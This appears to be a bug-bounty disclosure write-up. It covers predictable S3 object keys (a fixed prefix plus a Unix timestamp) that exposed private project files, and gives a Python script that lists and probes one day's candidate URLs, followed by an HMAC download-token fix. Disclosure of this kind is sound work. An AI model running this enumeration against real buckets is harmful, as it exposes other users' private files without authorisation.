Improper Storage of Private Project’s Files


Severity: High

Complexity: Easy

Weakness: Improper Storage of files on S3 Buckets


  • While testing a private program on HackerOne, I found that the target's main feature is writing code for a project and saving that project as either Private or Public.
  • Whenever something is stored in a Public project, its files are saved to:

https://REDACTED.s3.amazonaws.com/sagewfextdg/uploads/1494851423/1.py

Here sagewfextdg is the prefix ID for Public projects.


  • Tried the same thing with a Private project:

https://REDACTED.s3.amazonaws.com/sawexvecswt/uploads/1494851123/1.py

Here sawexvecswt is the prefix ID for Private projects.


  • Now we have the prefix IDs under which Public and Private project files are saved in the S3 bucket, and both are fixed. The rest of the object key looks like:

/uploads/1494851423/1.py

  • The only part we don't control is the directory /1494851423/, which is nothing but a Unix timestamp.

A Unix timestamp is the number of seconds since 1970-01-01 00:00:00 UTC; it encodes the year, month, day, hour, minute and second of the upload. Since the prefix ID is fixed and the file name is guessable, the timestamp is the only unknown, so a file uploaded on a given day sits at one of just 86,400 possible URLs.

  • You can convert a timestamp to human-readable form at http://www.unixtimestamp.com/
  • I wrote a simple script with Python's datetime module to generate every timestamp for a whole day (24 hours, one per second) and started fuzzing the Private-project path with them.
  • Demonstrated by placing a simple .JPG file in a project.
  • I was able to access other users' private files.
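The enumeration described above, as an added example (not the script from the original report): it generates one candidate object URL per second of a chosen UTC day for the Private-project prefix the page shows, checks each one, and reports the hits. The bucket host is the page's REDACTED placeholder, the ownership of the timestamp 1494851123 is taken from the page, and the "bucket" the demo queries is a constructed in-memory stand-in so it runs offline; `http_status` is the real HEAD request you would swap in against a live target.

```python
"""Enumerate predictable S3 object keys of the form
<bucket>/<prefix-id>/uploads/<unix-timestamp>/<filename>,
one guess per second of a chosen UTC day (86,400 candidates)."""
from datetime import datetime, timezone
from typing import Callable, Iterable, List, Set
import urllib.error
import urllib.request

BUCKET = "https://REDACTED.s3.amazonaws.com"  # placeholder host, as on the page
PRIVATE_PREFIX = "sawexvecswt"                # Private-project prefix ID from the page
DEMO_DAY = datetime(2017, 5, 15, tzinfo=timezone.utc)  # the UTC day 1494851123 falls on


def describe_timestamp(ts: int) -> str:
    """Human-readable UTC date/time for a Unix timestamp (what unixtimestamp.com shows)."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


def day_start_utc(day: datetime) -> int:
    """Unix timestamp of 00:00:00 UTC on the given day (naive datetimes are taken as UTC)."""
    if day.tzinfo is None:
        day = day.replace(tzinfo=timezone.utc)
    start = day.astimezone(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
    return int(start.timestamp())


def day_timestamps(day: datetime) -> Iterable[int]:
    """Every second of the UTC day containing `day`."""
    base = day_start_utc(day)
    return range(base, base + 24 * 60 * 60)


def candidate_urls(prefix: str, day: datetime, filename: str) -> List[str]:
    """All object URLs an upload with this prefix/filename could have received that day."""
    return [f"{BUCKET}/{prefix}/uploads/{ts}/{filename}" for ts in day_timestamps(day)]


def http_status(url: str) -> int:
    """Real HEAD request: S3 answers 200 for an existing readable object and
    403/404 otherwise. Not used by the offline demo below."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def fuzz(urls: Iterable[str], fetch: Callable[[str], int]) -> List[str]:
    """Return the URLs that `fetch` reports as accessible (status 200)."""
    return [u for u in urls if fetch(u) == 200]


# Constructed stand-in for the bucket so the demo runs offline: one private
# object exists at the timestamp the page shows; everything else is denied.
CONSTRUCTED_OBJECTS: Set[str] = {
    f"{BUCKET}/{PRIVATE_PREFIX}/uploads/1494851123/1.py",
}


def make_fake_fetch(existing: Set[str]) -> Callable[[str], int]:
    """Fetch callable backed by the constructed object set (200 if present, else 403)."""
    return lambda url: 200 if url in existing else 403


if __name__ == "__main__":
    urls = candidate_urls(PRIVATE_PREFIX, DEMO_DAY, "1.py")
    print(len(urls), "candidates, first:", urls[0])
    for hit in fuzz(urls, make_fake_fetch(CONSTRUCTED_OBJECTS)):
        print("hit:", hit, "uploaded at", describe_timestamp(int(hit.split("/")[-2])))
    # Against a live target, pass http_status instead of the fake fetch.
```

Against a real bucket, 86,400 HEAD requests per file name and day is cheap, which is the whole point: a fixed prefix plus a second-resolution timestamp is not a secret, and a bucket that relies on it for Private projects is effectively public.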

  • As a fix, they added an auth token check for viewing or downloading files from the S3 bucket.
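The page only says a token check was added; the following is an added example of what such a check has to do, written for this post and not the program's actual code. The design is a hypothetical reconstruction: the server mints a token only after confirming the requester owns the project, the token is an HMAC over (user, object key, expiry), and the download endpoint refuses any key presented without a matching, unexpired token. The secret, the user IDs and the ownership table are constructed demo data, and the prefix IDs are the ones the page shows.

```python
"""Download-token check: a guessable S3 key is useless without a token that is
bound to the requesting user, to that exact key, and to an expiry time."""
import hashlib
import hmac
import time
from typing import Dict, Optional

SECRET = b"constructed-demo-secret-do-not-reuse"  # constructed; keep in a secret store in practice
TOKEN_TTL = 300                                   # seconds a download link stays valid

# Constructed ownership table: project prefix ID -> owning user.
PROJECT_OWNER: Dict[str, str] = {
    "sagewfextdg": "alice",  # Public-project prefix from the page
    "sawexvecswt": "bob",    # Private-project prefix from the page
}


def key_prefix(key: str) -> str:
    """'sawexvecswt/uploads/1494851123/1.py' -> 'sawexvecswt'."""
    return key.split("/", 1)[0]


def sign(user: str, key: str, expires_at: int) -> str:
    """HMAC-SHA256 over user|key|expiry, so the token cannot be moved to another user or key."""
    msg = f"{user}|{key}|{expires_at}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_token(user: str, key: str, now: Optional[int] = None) -> Optional[str]:
    """Authorization happens here: a token is minted only for the project owner."""
    if PROJECT_OWNER.get(key_prefix(key)) != user:
        return None  # not your project: no token at all
    expires_at = (now if now is not None else int(time.time())) + TOKEN_TTL
    return f"{expires_at}.{sign(user, key, expires_at)}"


def verify_download(user: str, key: str, token: str, now: Optional[int] = None) -> bool:
    """Download endpoint check: token must be well-formed, unexpired, and bound
    to exactly this user and this object key."""
    try:
        exp_str, sig = token.split(".", 1)
        expires_at = int(exp_str)
    except ValueError:
        return False
    current = now if now is not None else int(time.time())
    if current > expires_at:
        return False
    return hmac.compare_digest(sign(user, key, expires_at), sig)


if __name__ == "__main__":
    key = "sawexvecswt/uploads/1494851123/1.py"
    tok = issue_token("bob", key)
    print("owner gets a token:", tok is not None)
    print("owner can download:", verify_download("bob", key, tok))
    print("enumerated URL, no token:", verify_download("alice", key, ""))
```

Two details matter more than the HMAC itself: the ownership check happens before a token is issued, so an attacker who has enumerated the URL still has nothing to present, and the user is part of the signed message, so a token legitimately issued for one's own file cannot be replayed against someone else's.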